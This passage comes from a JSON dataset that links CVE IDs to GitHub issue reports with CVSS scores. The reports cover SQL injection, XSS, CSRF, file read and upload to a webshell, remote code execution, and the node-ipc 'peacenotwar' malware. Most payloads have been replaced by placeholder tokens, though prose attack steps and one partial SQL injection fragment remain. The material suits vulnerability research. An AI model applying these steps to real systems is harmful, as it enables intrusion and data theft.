  78969. "Issue_Created_At": "2021-12-21T07:39:17Z",
  78970. "description": "xfrm interface ipsec1 exist after core dump and blocking restart of ipsec service clean. After setting up plutodebug=base, I got the packet which may cause core dump when ike NUMBERTAG is not accept APITAG NUMBERTAG localhost pluto NUMBERTAG received NUMBERTAG bytes from APITAG on eth0 APITAG using UDP Dec NUMBERTAG localhost pluto NUMBERTAG fc b NUMBERTAG e NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG cc NUMBERTAG d NUMBERTAG c ...............\\ Dec NUMBERTAG localhost pluto NUMBERTAG P.... Dec NUMBERTAG localhost pluto NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG b NUMBERTAG c NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG e NUMBERTAG fc b NUMBERTAG e NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG cc ................ Dec NUMBERTAG localhost pluto NUMBERTAG d NUMBERTAG c NUMBERTAG P Dec NUMBERTAG localhost pluto NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG b NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG c NUMBERTAG e NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG b NUMBERTAG c NUMBERTAG e NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG parse ISAKMP Message: Dec NUMBERTAG localhost pluto NUMBERTAG initiator SPI NUMBERTAG fc b NUMBERTAG e NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG responder SPI NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG next payload type: ISAKMP_NEXT_SA NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG ISAKMP version: ISAKMP Version NUMBERTAG rfc NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG exchange type: ISAKMP_XCHG_IDPROT NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG flags: none NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG Message ID NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG length NUMBERTAG cc) Dec NUMBERTAG localhost pluto NUMBERTAG processing version NUMBERTAG packet with exchange type=ISAKMP_XCHG_IDPROT NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG State DB: IKE NUMBERTAG state not found (find_state_ike NUMBERTAG init) Dec NUMBERTAG localhost pluto NUMBERTAG null state always idle Dec NUMBERTAG localhost pluto NUMBERTAG got payload NUMBERTAG ISAKMP_NEXT_SA) needed NUMBERTAG opt NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG parse ISAKMP Security Association Payload: Dec NUMBERTAG localhost pluto NUMBERTAG next payload type: ISAKMP_NEXT_VID NUMBERTAG d) Dec NUMBERTAG localhost pluto NUMBERTAG length NUMBERTAG c) Dec NUMBERTAG localhost pluto NUMBERTAG DOI: ISAKMP_DOI_IPSEC NUMBERTAG Dec NUMBERTAG localhost pluto NUMBERTAG got payload NUMBERTAG ISAKMP_NEXT_VID) needed NUMBERTAG opt NUMBERTAG Dec NUMBERTAG localhost systemd NUMBERTAG APITAG Main process exited, code=dumped, status NUMBERTAG SEGV Dec NUMBERTAG localhost systemd NUMBERTAG APITAG Failed with result 'core dump'. Dec NUMBERTAG localhost systemd NUMBERTAG APITAG Consumed NUMBERTAG s CPU time. Dec NUMBERTAG localhost systemd NUMBERTAG APITAG Scheduled restart job, restart counter is at NUMBERTAG Dec NUMBERTAG localhost systemd NUMBERTAG Stopped Internet Key Exchange (IKE) Protocol Daemon for APITAG Dec NUMBERTAG localhost systemd NUMBERTAG APITAG Consumed NUMBERTAG s CPU time. Dec NUMBERTAG localhost systemd NUMBERTAG Starting Internet Key Exchange (IKE) Protocol Daemon for APITAG normally after core dump the APITAG service restart by unfortunately the original xfrm interface was not clear and cause below: APITAG NUMBERTAG localhost pluto NUMBERTAG ike NUMBERTAG cp\": conflict ipsec1 already exist cannot support xfrm interface. May be leftover from previous pluto? Dec NUMBERTAG localhost pluto NUMBERTAG ike NUMBERTAG cp\": failed to add connection: ipsec interface NUMBERTAG not supported. device name conflict in APITAG This cause the VPN server not accept any connection request and need manual restart the service. Any workaround?",
  78971. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  78972. "severity": "HIGH",
  78973. "baseScore": 7.5,
  78974. "impactScore": 3.6,
  78975. "exploitabilityScore": 3.9
  78976. },
  78977. {
  78978. "CVE_ID": "CVE-2022-23316",
  78979. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/15",
  78980. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/15",
  78981. "Repo_new": "taogogo/taocms",
  78982. "Issue_Created_At": "2022-01-10T07:43:07Z",
  78983. "description": "arbitrary file read vulnerability. analysis The location of the vulnerability is line NUMBERTAG in PATHTAG and we can see that the path parameter is passed directly to the file_get_contents function without filtering FILETAG FILETAG poc After login as APITAG the file management interface and edit function FILETAG Get packets using Burp Any file can be read after changing the path parameter FILETAG",
  78984. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  78985. "severity": "MEDIUM",
  78986. "baseScore": 4.9,
  78987. "impactScore": 3.6,
  78988. "exploitabilityScore": 1.2
  78989. },
  78990. {
  78991. "CVE_ID": "CVE-2022-23318",
  78992. "Issue_Url_old": "https://github.com/ganaware/pcf2bdf/issues/4",
  78993. "Issue_Url_new": "https://github.com/ganaware/pcf2bdf/issues/4",
  78994. "Repo_new": "ganaware/pcf2bdf",
  78995. "Issue_Created_At": "2022-01-11T12:41:03Z",
  78996. "description": "Heap buffer overflow in pcf2bdf. Hello MENTIONTAG as discussed earlier: I have compiled pcf2bdf with address sanitization and fuzz tested inputs with AFL . The file attached causes a memory access violation. The actual input file is stored within the zipped folder attached. Input: APITAG Output: ERRORTAG FILETAG",
  78997. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  78998. "severity": "HIGH",
  78999. "baseScore": 7.1,
  79000. "impactScore": 5.2,
  79001. "exploitabilityScore": 1.8
  79002. },
  79003. {
  79004. "CVE_ID": "CVE-2022-23319",
  79005. "Issue_Url_old": "https://github.com/ganaware/pcf2bdf/issues/5",
  79006. "Issue_Url_new": "https://github.com/ganaware/pcf2bdf/issues/5",
  79007. "Repo_new": "ganaware/pcf2bdf",
  79008. "Issue_Created_At": "2022-01-11T12:45:15Z",
  79009. "description": "Segmentation fault ASAN Deadly Signal in pcf2bdf. Hello MENTIONTAG as discussed earlier: I have compiled pcf2bdf with address sanitization and fuzz tested inputs with AFL. The file is partially parsed before the program crashes due to a segmentation fault. The actual input file is stored within the zipped folder attached. Input: APITAG Output: ERRORTAG FILETAG",
  79010. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  79011. "severity": "MEDIUM",
  79012. "baseScore": 5.5,
  79013. "impactScore": 3.6,
  79014. "exploitabilityScore": 1.8
  79015. },
  79016. {
  79017. "CVE_ID": "CVE-2022-23331",
  79018. "Issue_Url_old": "https://github.com/dataease/dataease/issues/1618",
  79019. "Issue_Url_new": "https://github.com/dataease/dataease/issues/1618",
  79020. "Repo_new": "dataease/dataease",
  79021. "Issue_Created_At": "2022-01-11T05:27:34Z",
  79022. "description": "Security APITAG APITAG NUMBERTAG Chrome NUMBERTAG Bug \u63cf\u8ff0 An authenticated user can access information about all users and change admin password Bug NUMBERTAG use demo login NUMBERTAG access api NUMBERTAG",
  79023. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  79024. "severity": "HIGH",
  79025. "baseScore": 8.8,
  79026. "impactScore": 5.9,
  79027. "exploitabilityScore": 2.8
  79028. },
  79029. {
  79030. "CVE_ID": "CVE-2022-23340",
  79031. "Issue_Url_old": "https://github.com/laurent22/joplin/issues/6004",
  79032. "Issue_Url_new": "https://github.com/laurent22/joplin/issues/6004",
  79033. "Repo_new": "laurent22/joplin",
  79034. "Issue_Created_At": "2022-01-11T12:59:44Z",
  79035. "description": "Remote Code Execution vulnerability. APITAG APITAG Environment Joplin version: Joplin NUMBERTAG prod, win NUMBERTAG Platform: Windows OS specifics: Windows NUMBERTAG APITAG Steps to reproduce This is a serious security vulnerability. I do not wish to make the details public until the author is contacted. APITAG Describe what you expected to happen I want to contact the author individually using email or telegram Logfile APITAG",
  79036. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79037. "severity": "CRITICAL",
  79038. "baseScore": 9.8,
  79039. "impactScore": 5.9,
  79040. "exploitabilityScore": 3.9
  79041. },
  79042. {
  79043. "CVE_ID": "CVE-2022-23363",
  79044. "Issue_Url_old": "https://github.com/g33kyrash/Online-Banking-system/issues/15",
  79045. "Issue_Url_new": "https://github.com/g33kyrash/online-banking-system/issues/15",
  79046. "Repo_new": "g33kyrash/online-banking-system",
  79047. "Issue_Created_At": "2022-01-14T01:51:17Z",
  79048. "description": "There is a SQL injection vulnerability in FILETAG . First visit FILETAG FILETAG Enter any user and APITAG burp to capture packets FILETAG Modify the data package as follows, save as APITAG ERRORTAG execute APITAG APITAG FILETAG",
  79049. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79050. "severity": "CRITICAL",
  79051. "baseScore": 9.8,
  79052. "impactScore": 5.9,
  79053. "exploitabilityScore": 3.9
  79054. },
  79055. {
  79056. "CVE_ID": "CVE-2022-23375",
  79057. "Issue_Url_old": "https://github.com/Zavy86/WikiDocs/issues/28",
  79058. "Issue_Url_new": "https://github.com/zavy86/wikidocs/issues/28",
  79059. "Repo_new": "zavy86/wikidocs",
  79060. "Issue_Created_At": "2022-02-19T13:50:49Z",
  79061. "description": "Multiple Vulnerabilities in APITAG NUMBERTAG APITAG Reflected XSS Injection First vulnerability in line NUMBERTAG FILETAG Second is in line NUMBERTAG FILETAG XSS directly using url: URLTAG NUMBERTAG APITAG Reflected XSS Injection Vulnerability in line NUMBERTAG FILETAG XSS directly using url: URLTAG }) PATHTAG NUMBERTAG SS NUMBERTAG E NUMBERTAG APITAG Debug mode can be enabled: Vulnerable lines are between NUMBERTAG FILETAG You can get sensitive information using debug mode: FILETAG NUMBERTAG APITAG Reflected Xss Injection: FILETAG NUMBERTAG APITAG Image upload, Authenticated Remote Code Execution: first, log in to the website and click edit button on the right top: FILETAG Before upload proccess, we have to create malicious payload image: FILETAG name: FILETAG payload : APITAG After that, you have to click image button on top and upload image: FILETAG Select malicious file and click upload: FILETAG In upload process, change file extension to the PHP in the POST request: FILETAG then the browser automatically sends another request to the malicious file: FILETAG Just browse it and try to execute some commands: FILETAG I hope you wil close these vulnerabilities ASAP.",
  79062. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  79063. "severity": "HIGH",
  79064. "baseScore": 8.8,
  79065. "impactScore": 5.9,
  79066. "exploitabilityScore": 2.8
  79067. },
  79068. {
  79069. "CVE_ID": "CVE-2022-23379",
  79070. "Issue_Url_old": "https://github.com/emlog/emlog/issues/144",
  79071. "Issue_Url_new": "https://github.com/emlog/emlog/issues/144",
  79072. "Repo_new": "emlog/emlog",
  79073. "Issue_Created_At": "2022-01-14T14:04:01Z",
  79074. "description": "emlog NUMBERTAG has SQL injection vulnerability. SQL injection exists in background batch deletion label\uff0cthe passed in key was not verified FILETAG Eventually, the APITAG parameter of APITAG can be passed in malicious code Function generating vulnerability ERRORTAG Verification FILETAG FILETAG FILETAG FILETAG",
  79075. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79076. "severity": "CRITICAL",
  79077. "baseScore": 9.8,
  79078. "impactScore": 5.9,
  79079. "exploitabilityScore": 3.9
  79080. },
  79081. {
  79082. "CVE_ID": "CVE-2022-23380",
  79083. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/16",
  79084. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/16",
  79085. "Repo_new": "taogogo/taocms",
  79086. "Issue_Created_At": "2022-01-15T18:16:58Z",
  79087. "description": "There is SQL blind injection at APITAG Edit\". FILETAG FILETAG CODETAG FILETAG FILETAG FILETAG PATHTAG FILETAG PATHTAG FILETAG PATHTAG FILETAG",
  79088. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  79089. "severity": "HIGH",
  79090. "baseScore": 8.8,
  79091. "impactScore": 5.9,
  79092. "exploitabilityScore": 2.8
  79093. },
  79094. {
  79095. "CVE_ID": "CVE-2022-23384",
  79096. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/58",
  79097. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/58",
  79098. "Repo_new": "yzmcms/yzmcms",
  79099. "Issue_Created_At": "2022-01-16T14:50:07Z",
  79100. "description": "There is one CSRF vulnerability that can add the administrator account . After the administrator logged in, open the following one page admin,add. URLTAG / APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  79101. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  79102. "severity": "HIGH",
  79103. "baseScore": 8.8,
  79104. "impactScore": 5.9,
  79105. "exploitabilityScore": 2.8
  79106. },
  79107. {
  79108. "CVE_ID": "CVE-2022-23387",
  79109. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/23",
  79110. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/23",
  79111. "Repo_new": "taogogo/taocms",
  79112. "Issue_Created_At": "2022-01-17T02:51:41Z",
  79113. "description": "There is SQL blind injection at APITAG Update\". CODETAG FILETAG FILETAG FILETAG FILETAG FILETAG PATHTAG FILETAG PATHTAG FILETAG PATHTAG FILETAG PATHTAG FILETAG",
  79114. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  79115. "severity": "HIGH",
  79116. "baseScore": 7.5,
  79117. "impactScore": 3.6,
  79118. "exploitabilityScore": 3.9
  79119. },
  79120. {
  79121. "CVE_ID": "CVE-2022-23389",
  79122. "Issue_Url_old": "https://github.com/sanluan/PublicCMS/issues/59",
  79123. "Issue_Url_new": "https://github.com/sanluan/publiccms/issues/59",
  79124. "Repo_new": "sanluan/publiccms",
  79125. "Issue_Created_At": "2021-11-25T10:38:25Z",
  79126. "description": "Arbitrary command execution vulnerability\uff08\u4efb\u610f\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff09. APITAG NUMBERTAG alue parameter has command execution vulnerability",
  79127. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79128. "severity": "CRITICAL",
  79129. "baseScore": 9.8,
  79130. "impactScore": 5.9,
  79131. "exploitabilityScore": 3.9
  79132. },
  79133. {
  79134. "CVE_ID": "CVE-2022-23391",
  79135. "Issue_Url_old": "https://github.com/tomoya92/pybbs/issues/171",
  79136. "Issue_Url_new": "https://github.com/atjiu/pybbs/issues/171",
  79137. "Repo_new": "atjiu/pybbs",
  79138. "Issue_Created_At": "2022-01-18T03:18:26Z",
  79139. "description": "This forum has a large number of xss vulnerabilities. The first is located at the home page search Enter in the search box APITAG FILETAG The second vulnerability is located in the backend In the topic editor in the background, enter ERRORTAG FILETAG FILETAG The third vulnerability is located at the topic search Enter in the search box APITAG FILETAG and many more ...",
  79140. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  79141. "severity": "MEDIUM",
  79142. "baseScore": 6.1,
  79143. "impactScore": 2.7,
  79144. "exploitabilityScore": 2.8
  79145. },
  79146. {
  79147. "CVE_ID": "CVE-2022-23596",
  79148. "Issue_Url_old": "https://github.com/junrar/junrar/issues/73",
  79149. "Issue_Url_new": "https://github.com/junrar/junrar/issues/73",
  79150. "Repo_new": "junrar/junrar",
  79151. "Issue_Created_At": "2022-01-27T03:29:04Z",
  79152. "description": "FILETAG Environment (please complete the following information): OS: Mac OS NUMBERTAG Junrar version NUMBERTAG Additional context It seems this APITAG can reach [this while loop] ( URLTAG but never breaks.",
  79153. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  79154. "severity": "HIGH",
  79155. "baseScore": 7.5,
  79156. "impactScore": 3.6,
  79157. "exploitabilityScore": 3.9
  79158. },
  79159. {
  79160. "CVE_ID": "CVE-2022-23638",
  79161. "Issue_Url_old": "https://github.com/darylldoyle/svg-sanitizer/issues/71",
  79162. "Issue_Url_new": "https://github.com/darylldoyle/svg-sanitizer/issues/71",
  79163. "Repo_new": "darylldoyle/svg-sanitizer",
  79164. "Issue_Created_At": "2022-02-14T16:03:26Z",
  79165. "description": "Requesting more details on GHSA fq NUMBERTAG p NUMBERTAG qcc. It seems tag APITAG addressed a security vulnerability, see corresponding advisory URLTAG Corresponding commit at URLTAG contains a new test case FILETAG . Invoked as APITAG in browser, mime type APITAG ERRORTAG \u2192 no problem since APITAG is not a SVG element Invoked as APITAG in browser, mime type APITAG ERRORTAG \u2192 valid concern, since HTML is used in inline SVG \u2192 scripts are executed in browser \u2192 cross site scripting Conclusion & Alternative approach removing non SVG elements (e.g. APITAG ) seems to be fine, see URLTAG removing APITAG and APITAG nodes seems to be superfluous and leads to regressions like in NUMBERTAG",
  79166. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  79167. "severity": "MEDIUM",
  79168. "baseScore": 6.1,
  79169. "impactScore": 2.7,
  79170. "exploitabilityScore": 2.8
  79171. },
  79172. {
  79173. "CVE_ID": "CVE-2022-23652",
  79174. "Issue_Url_old": "https://github.com/clastix/capsule-proxy/issues/188",
  79175. "Issue_Url_new": "https://github.com/clastix/capsule-proxy/issues/188",
  79176. "Repo_new": "clastix/capsule-proxy",
  79177. "Issue_Created_At": "2022-02-18T19:53:04Z",
  79178. "description": "Privilege escalation vulnerability via malicious APITAG header. A user crafting an API request directed at APITAG can get a privilege escalation using the Service Account of the proxy itself. This is done by passing the APITAG or APITAG header in the Connection header, using the same exploit described here: URLTAG > At this point, instead of impersonating the user and their permissions, the request will act as if it was from the APITAG management server~~ Capsule Proxy and incorrectly return the information.",
  79179. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  79180. "severity": "HIGH",
  79181. "baseScore": 8.8,
  79182. "impactScore": 5.9,
  79183. "exploitabilityScore": 2.8
  79184. },
  79185. {
  79186. "CVE_ID": "CVE-2022-23812",
  79187. "Issue_Url_old": "https://github.com/RIAEvangelist/node-ipc/issues/233",
  79188. "Issue_Url_new": "https://github.com/riaevangelist/node-ipc/issues/233",
  79189. "Repo_new": "RIAEvangelist/node-ipc",
  79190. "Issue_Created_At": "2022-03-09T15:24:42Z",
  79191. "description": "Remove the 'peacenotwar' module as it is literally malware. Remove the 'peacenotwar' module as it is literally malware > This code serves as a non destructive example of why controlling your node modules is important. The module literally then proceeds to write files to the host's device: URLTAG Don't get me wrong, I'm against all forms of war, but sabotaging people's dependencies is not the way to protest. Slava Ukraini",
  79192. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79193. "severity": "CRITICAL",
  79194. "baseScore": 9.8,
  79195. "impactScore": 5.9,
  79196. "exploitabilityScore": 3.9
  79197. },
  79198. {
  79199. "CVE_ID": "CVE-2022-23812",
  79200. "Issue_Url_old": "https://github.com/RIAEvangelist/node-ipc/issues/236",
  79201. "Issue_Url_new": "https://github.com/riaevangelist/node-ipc/issues/236",
  79202. "Repo_new": "RIAEvangelist/node-ipc",
  79203. "Issue_Created_At": "2022-03-15T14:17:30Z",
  79204. "description": "A package should never try to do unrelated things. Give people a hamburger when they want one; do not try giving them a hamburger with some shits.",
  79205. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79206. "severity": "CRITICAL",
  79207. "baseScore": 9.8,
  79208. "impactScore": 5.9,
  79209. "exploitabilityScore": 3.9
  79210. },
  79211. {
  79212. "CVE_ID": "CVE-2022-2385",
  79213. "Issue_Url_old": "https://github.com/kubernetes-sigs/aws-iam-authenticator/issues/472",
  79214. "Issue_Url_new": "https://github.com/kubernetes-sigs/aws-iam-authenticator/issues/472",
  79215. "Repo_new": "kubernetes-sigs/aws-iam-authenticator",
  79216. "Issue_Created_At": "2022-07-11T16:15:16Z",
  79217. "description": "CVETAG : APITAG validation bypass. CVSS Rating: High URLTAG A security issue was discovered in aws iam authenticator where an allow listed IAM identity may be able to modify their username and escalate privileges. This issue has been rated high ( URLTAG and assigned CVETAG Am I vulnerable? Users are only affected if they use the APITAG template parameter to construct a username and provide different levels of access based on the username. Affected Versions aws iam authenticator NUMBERTAG How do I mitigate this vulnerability? Upgrading to NUMBERTAG mitigates this vulnerability. Prior to upgrading, this vulnerability can be mitigated by not using the APITAG template value to construct usernames. Fixed Versions aws iam authenticator NUMBERTAG Detection This issue affected the logged identity, and is not discernable from valid requests. Acknowledgements This vulnerability was reported by Gafnit Amiga from Lightspin. /area security /kind bug /committee security response /label official cve feed",
  79218. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  79219. "severity": "HIGH",
  79220. "baseScore": 8.8,
  79221. "impactScore": 5.9,
  79222. "exploitabilityScore": 2.8
  79223. },
  79224. {
  79225. "CVE_ID": "CVE-2022-23850",
  79226. "Issue_Url_old": "https://github.com/kevinboone/epub2txt2/issues/17",
  79227. "Issue_Url_new": "https://github.com/kevinboone/epub2txt2/issues/17",
  79228. "Repo_new": "kevinboone/epub2txt2",
  79229. "Issue_Created_At": "2022-01-22T14:00:27Z",
  79230. "description": "FILETAG POC file at the bottom of this report. With ASAN Note: You can use ASAN for more direct verification. ERRORTAG ASAN Report ERRORTAG POC FILETAG Any issue plz contact with me: APITAG OR: twitter: MENTIONTAG",
  79231. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  79232. "severity": "HIGH",
  79233. "baseScore": 7.8,
  79234. "impactScore": 5.9,
  79235. "exploitabilityScore": 1.8
  79236. },
  79237. {
  79238. "CVE_ID": "CVE-2022-23872",
  79239. "Issue_Url_old": "https://github.com/emlog/emlog/issues/147",
  79240. "Issue_Url_new": "https://github.com/emlog/emlog/issues/147",
  79241. "Repo_new": "emlog/emlog",
  79242. "Issue_Created_At": "2022-01-20T17:20:47Z",
  79243. "description": "Emlog pro NUMBERTAG has xss stored in FILETAG via footer_info param. + VULNERABLE A Stored Cross Site Scripting (XSS) injection vulnerability exists in Emlog pro version NUMBERTAG An attacker can inject arbitrary javascripts in FILETAG via footer_info param. + Date: PATHTAG + Exploit Author: Tr\u01b0\u01a1ng H\u1eefu Ph\u00fac Contact me: + Github: URLTAG + Facebook: URLTAG + Email: EMAILTAG + Product: Emlog pro + Version NUMBERTAG Description: The vulnerability is present in the PATHTAG and can be exploited through a POST request via the \u2018footer_info\u2019 param. + Impact: An attacker can send javascripts code through any vulnerable form field to change the design of the website or any information displayed to the user, saving the information persistently on the site (e.g. database). + Suggestions: You should limit tag script and HTML Event Attributes. FILETAG + File report: URLTAG + Video Poc: URLTAG + Proof of concept (POC): + Injection javascript: FILETAG + As can be seen from the following evidence, the content of the injection was correctly saved on the page (on the database) and executed. FILETAG",
  79244. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  79245. "severity": "MEDIUM",
  79246. "baseScore": 4.8,
  79247. "impactScore": 2.7,
  79248. "exploitabilityScore": 1.7
  79249. },
  79250. {
  79251. "CVE_ID": "CVE-2022-23880",
  79252. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/25",
  79253. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/25",
  79254. "Repo_new": "taogogo/taocms",
  79255. "Issue_Created_At": "2022-01-19T07:45:25Z",
  79256. "description": "A malicious file upload vulnerability exists in FILETAG of the file management function module.. This is the latest NUMBERTAG ersion of taocms. Organize and utilize steps in two steps\uff1a Step1\uff1a Audit the source code PATHTAG line NUMBERTAG and find that there may be arbitrary new files vulnerability: FILETAG Follow up $this >realpath and find that it comes from $this >path, and $this >path can be passed in through the get parameter (where SYS_ROOT is the root directory of the website): FILETAG Here you can construct the request package for the new APITAG file: FILETAG New FILETAG is successfully created: FILETAG Step2: It is also the PATHTAG file. It is found in line NUMBERTAG that there may be an arbitrary file writing vulnerability: FILETAG The written content $_POST FILETAG Successful connection to webshell FILETAG FILETAG",
  79257. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79258. "severity": "CRITICAL",
  79259. "baseScore": 9.8,
  79260. "impactScore": 5.9,
  79261. "exploitabilityScore": 3.9
  79262. },
  79263. {
  79264. "CVE_ID": "CVE-2022-23882",
  79265. "Issue_Url_old": "https://github.com/yeyinshi/tuzicms/issues/10",
  79266. "Issue_Url_new": "https://github.com/yeyinshi/tuzicms/issues/10",
  79267. "Repo_new": "yeyinshi/tuzicms",
  79268. "Issue_Created_At": "2022-01-19T06:33:29Z",
  79269. "description": "PATHTAG has APITAG PATHTAG NUMBERTAG Find where the file was uploaded FILETAG NUMBERTAG Use burpsuite to intercept requests, modify packets, and add payloads FILETAG FILETAG NUMBERTAG Vulnerability analysis poc NUMBERTAG AND (SELECT NUMBERTAG FROM(SELECT COUNT( ),CONCAT(' FILETAG debugging process: FILETAG NUMBERTAG Repair suggestion: before executing the APITAG function, filter the id",
  79270. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79271. "severity": "CRITICAL",
  79272. "baseScore": 9.8,
  79273. "impactScore": 5.9,
  79274. "exploitabilityScore": 3.9
  79275. },
  79276. {
  79277. "CVE_ID": "CVE-2022-23887",
  79278. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/59",
  79279. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/59",
  79280. "Repo_new": "yzmcms/yzmcms",
  79281. "Issue_Created_At": "2022-01-21T03:30:48Z",
  79282. "description": "APITAG NUMBERTAG CSRF vulnerability exists in the official APITAG NUMBERTAG csrf\u6f0f\u6d1e). This vulnerability allows arbitrary users to be deleted. There is a user with ID NUMBERTAG FILETAG Click delete and capture the package to generate the POC of CSRF, FILETAG Package the deletion request to drop, and put the generated POC in the HTML page and send it to the administrator. When the administrator clicks the page, the user with ID NUMBERTAG can be deleted. FILETAG FILETAG",
  79283. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  79284. "severity": "MEDIUM",
  79285. "baseScore": 6.5,
  79286. "impactScore": 3.6,
  79287. "exploitabilityScore": 2.8
  79288. },
  79289. {
  79290. "CVE_ID": "CVE-2022-23888",
  79291. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/60",
  79292. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/60",
  79293. "Repo_new": "yzmcms/yzmcms",
  79294. "Issue_Created_At": "2022-01-22T02:18:45Z",
  79295. "description": "APITAG NUMBERTAG There is a CSRF vulnerability in the foreground in the official APITAG NUMBERTAG csrf\u6f0f\u6d1e). Prepare two accounts: test NUMBERTAG and test NUMBERTAG background settings allow users to contribute, Generate POC of CSRF with test NUMBERTAG First log in to test NUMBERTAG and comment on an article, and grab the request packet, FILETAG FILETAG Log in to TEST NUMBERTAG with another browser and open the web page of the generated POC, Triggered CSRF and successfully commented as TEST NUMBERTAG FILETAG",
  79296. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  79297. "severity": "HIGH",
  79298. "baseScore": 8.8,
  79299. "impactScore": 5.9,
  79300. "exploitabilityScore": 2.8
  79301. },
  79302. {
  79303. "CVE_ID": "CVE-2022-23889",
  79304. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/61",
  79305. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/61",
  79306. "Repo_new": "yzmcms/yzmcms",
  79307. "Issue_Created_At": "2022-01-22T02:43:52Z",
  79308. "description": "APITAG NUMBERTAG There are concurrent operations in the front desk of the official APITAG NUMBERTAG Prepare an account test NUMBERTAG comment at the bottom of an article, and grab the request package, FILETAG Send to repeater, FILETAG Manually send several times, you can batch brush malicious comments. FILETAG",
  79309. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  79310. "severity": "MEDIUM",
  79311. "baseScore": 5.3,
  79312. "impactScore": 1.4,
  79313. "exploitabilityScore": 3.9
  79314. },
  79315. {
  79316. "CVE_ID": "CVE-2022-23898",
  79317. "Issue_Url_old": "https://github.com/ming-soft/MCMS/issues/62",
  79318. "Issue_Url_new": "https://github.com/ming-soft/mcms/issues/62",
  79319. "Repo_new": "ming-soft/mcms",
  79320. "Issue_Created_At": "2022-01-20T13:28:38Z",
